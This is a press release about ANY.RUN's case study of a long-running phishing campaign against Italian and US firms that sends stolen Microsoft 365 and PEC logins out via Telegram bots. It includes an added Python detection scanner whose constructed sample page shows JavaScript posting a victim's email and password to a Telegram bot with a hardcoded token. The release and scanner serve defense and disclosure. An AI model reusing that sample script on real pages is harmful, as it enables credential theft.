
ANY.RUN Exposes Long-Running Phishing Campaign Targeting Italian and US Companies

DUBAI, DUBAI, UNITED ARAB EMIRATES, May 21, 2025 /EINPresswire.com/ -- ANY.RUN, a leader in cybersecurity solutions, has released a new case study exposing a long-running phishing campaign that uses Telegram bots for credential exfiltration. By applying a previously documented message interception technique, analysts uncovered attacker-controlled infrastructure dating back to 2022, targeting Microsoft 365 and PEC users through low-effort phishing pages hosted on platforms like Notion and Glitch.

Expanding Visibility Through Telegram Bot Interception

Using Telegram's API, the team was able to intercept and analyze live data exfiltration flows, giving them rare visibility into the attacker's operations. This pivot turned a single sandbox session into a broader investigation, revealing credential theft across multiple regions, repeated bot infrastructure reuse, and signs that the campaign is driven by access brokers rather than highly advanced threat actors.

Key Takeaways from the Case Study

Key insights from this in-depth case study include:

· Telegram bots were used as exfiltration channels, with hardcoded tokens and chat IDs embedded in phishing scripts

· Campaign impersonates Microsoft OneNote, Outlook, and Italy's PEC system

· Hosted on low-cost/free infrastructure: Notion, Glitch, RenderForest, and others

· One of the attacks targeted Italian companies, including A&D, Steelsystem Building, Gruppo Amag, and others

· Threat activity traced from 2022 to 2025, still active at the time of publication

· Victims span industries like logistics, utilities, finance, and digital identity

· ANY.RUN shares detection assets: IOCs, YARA rules, Suricata rules, and Telegram analysis scripts

· Attribution remains uncertain, but patterns suggest credential resale and access brokering
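As an added illustration of the first takeaway (this is not ANY.RUN's code or one of the scripts the case study publishes), the following Python scanner flags a captured phishing page that hardcodes a Telegram Bot API token and chat ID, records which Bot API method it calls, and masks the secret so the finding can be shared as an indicator. The sample page, its token and its chat ID are constructed for the example.

```python
import re
from dataclasses import dataclass

# A Telegram Bot API token is "<numeric bot id>:<35-char secret>" over the
# alphabet [A-Za-z0-9_-]; every Bot API call carries it in the URL path as
# api.telegram.org/bot<token>/<method>, which is what the regexes key on.
TOKEN_RE = re.compile(r"(?<![\w-])(\d{5,12}):([A-Za-z0-9_-]{35})(?![\w-])")
# Lazy span tolerates the token being concatenated in at runtime.
METHOD_RE = re.compile(r"api\.telegram\.org/bot.{0,80}?/(send[A-Za-z]+)")
CHAT_ID_RE = re.compile(r"chat_?id\s*[=:]\s*['\"]?(-?\d{4,20})", re.I)

@dataclass(frozen=True)
class Finding:
    bot_id: str          # numeric part, safe to publish as an indicator
    token_redacted: str  # secret masked so reports do not leak a live token
    chat_ids: tuple      # destination chat IDs found next to the token
    methods: tuple       # Bot API methods the page calls (sendMessage, ...)

def redact(bot_id: str, secret: str) -> str:
    return f"{bot_id}:{secret[:3]}{'*' * (len(secret) - 6)}{secret[-3:]}"

def scan_for_telegram_exfil(source: str) -> list:
    """Return one Finding per distinct bot token hardcoded in `source`."""
    chat_ids = tuple(sorted(set(CHAT_ID_RE.findall(source))))
    methods = tuple(sorted(set(METHOD_RE.findall(source))))
    seen, findings = set(), []
    for bot_id, secret in TOKEN_RE.findall(source):
        if bot_id not in seen:
            seen.add(bot_id)
            findings.append(Finding(bot_id, redact(bot_id, secret), chat_ids, methods))
    return findings

# Constructed sample of a phishing page's exfiltration script (token and
# chat ID are made up): submitted credentials go straight to a Telegram bot.
SAMPLE_PAGE = """
<form id="login"><input id="email"><input id="pwd" type="password"></form>
<script>
const TOKEN = "7201234567:AAHConstructedSample0123456789abcde";
const CHAT_ID = "-1001234567890";
async function send() {
  const text = "user=" + email.value + "&pass=" + pwd.value;
  await fetch("https://api.telegram.org/bot" + TOKEN + "/sendMessage?chat_id="
              + CHAT_ID + "&text=" + encodeURIComponent(text));
}
</script>
"""

if __name__ == "__main__":
    for finding in scan_for_telegram_exfil(SAMPLE_PAGE):
        print(finding)
```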

To explore the full technical analysis, including Telegram bot scripts, victim profiling, and detection recommendations, visit ANY.RUN's blog.

About ANY.RUN

ANY.RUN is a cybersecurity provider offering a suite of advanced tools for malware analysis and threat intelligence. Its interactive sandbox supports real-time analysis across Windows, Linux, and Android environments, giving security professionals hands-on visibility into malicious behavior. Trusted by over 15,000 companies worldwide, ANY.RUN also offers comprehensive Threat Intelligence solutions, including TI Lookup, Feeds, and YARA Search, to help teams detect threats faster and respond with confidence.

The ANY.RUN team
ANYRUN FZCO
+1 657-366-5050